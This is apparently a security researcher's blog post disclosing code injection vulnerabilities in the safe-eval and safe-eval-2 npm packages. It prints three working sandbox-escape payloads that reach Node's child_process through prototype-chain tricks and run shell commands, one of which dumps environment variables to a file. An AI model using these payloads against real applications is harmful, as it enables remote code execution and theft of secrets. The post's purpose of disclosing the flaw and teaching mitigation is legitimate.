~ 3 min read

Disclosing code injection vulnerabilities in safe-eval-2 npm package

share this story on
A project fork is not without risks, and this time it's the safe-eval-2 npm package that is vulnerable to code injection attacks.

During a security research as part of my upcoming Code Injection book about Node.js Secure Coding I audited several npm packages and found a code injection vulnerability in the safe-eval-2 npm package.

This package is a fork of the original safe-eval package, which was supposed to be a promise for a secure JavaScript eval() function, but history proved otherwise. The original safe-eval package was found to be vulnerable to code injection attacks multiple times, and the safe-eval-2 npm package forked by another user (lcnvdl), included some commits, and published as a new version and alternative to the original package, that is supposed to be secure.

Luckily, safe-eval-2 doesn’t include many downloads or dependant packages, but it’s still important to disclose the vulnerability an create a CVE identifier for it so that the community can be aware of the risks of using this package.

safe-eval-2 npm package on the npm registry

Code injection in safe-eval and safe-eval-2 vulnerability details

There are many ways to bypass the security sandbox of safe-eval and all versions are now considered vulnerable and JavaScript developers should not use it in their applications.

Following are publicly known proof-of-concept payloads that attackers could employ to exploit server-side JavaScript applications running Node.js or other compatible runtimes that support safe-eval or safe-eval-2:

var safeEval = require('safe-eval')

let code = `
(function () {
    let ret = hasOwnProperty;
    ret.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}());
`
safeEval(code);

The above code snippet demonstrates an exploit in which an immediately invoked function expression (IIFE) uses the hasOwnProperty method to access the process object and execute a shell command to create a file named flag in the root directory of the running Node.js server.

Another proof-of-concept payload that demonstrates a code injection vulnerability in safe-eval is:

var safeEval = require('safe-eval')

let code = ` (function() { 
    try { 
        __defineGetter__("x", );
    } catch(ret){
        ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
    }}
)()
`

safeEval(code);

In this case, the exploit uses the __defineGetter__ method to trigger an error, then using the Error object, traverse the prototype chain and access the process object to execute a shell command that creates a file named flag in the root directory of the Node.js server.

Well, safe-eval-2 is also vulnerable. Here are a few examples of how to exploit the safe-eval-2 package:

const safeEval = require("safe-eval-2");

const code = `
    
    (function() {
      // using the hasOwnProperty method to access the process object and execute a shell command
      hasOwnProperty.__proto__.constructor('return process')().mainModule.require('child_process').execSync('env > /tmp/rce1');

      // using a failed import to access the process object through the Error object and execute a shell command 
      // import('test').catch((e)=>{})['constructor']['constructor']('return process')().mainModule.require('child_process').execSync('touch /tmp/rce2')
    })()
    
  `;

safeEval(code);

Vulnerability disclosure

This code injection vulnerability affects all known versions of safe-eval-2 which to this date is 0.4.2 and prior.

Since the safe-eval-2 package is a fork of the original safe-eval package, and not allowing for new issues to be reported, nor isn’t a great risk to the community due to the low usage, I am going to disclose this vulnerability publicly through this blog post and an issue opened in the upstream project safe-eval repository.

Learn how to mitigate code injection

As I mentioned in the opening paragraph, I am working on a book about secure coding in Node.js that focuses entirely on code injection vulnerabilities in JavaScript and the Node.js runtime.

You’ll learn how to mitigate the type of code injection vulnerabilities like I shared here about safe-eval-2 as well as different exploitation methods and payloads. If you are interested in learning more about this topic, I invite you to get the book and level up on security skills as a developer: Node.js Secure Coding: Mitigating and Exploiting Code Injection Vulnerabilities.


Node.js Security Newsletter

Subscribe to get everything in and around the Node.js security ecosystem, direct to your inbox.

    JavaScript & web security insights, latest security vulnerabilities, hands-on secure code insights, npm ecosystem incidents, Node.js runtime feature updates, Bun and Deno runtime updates, secure coding best practices, malware, malicious packages, and more.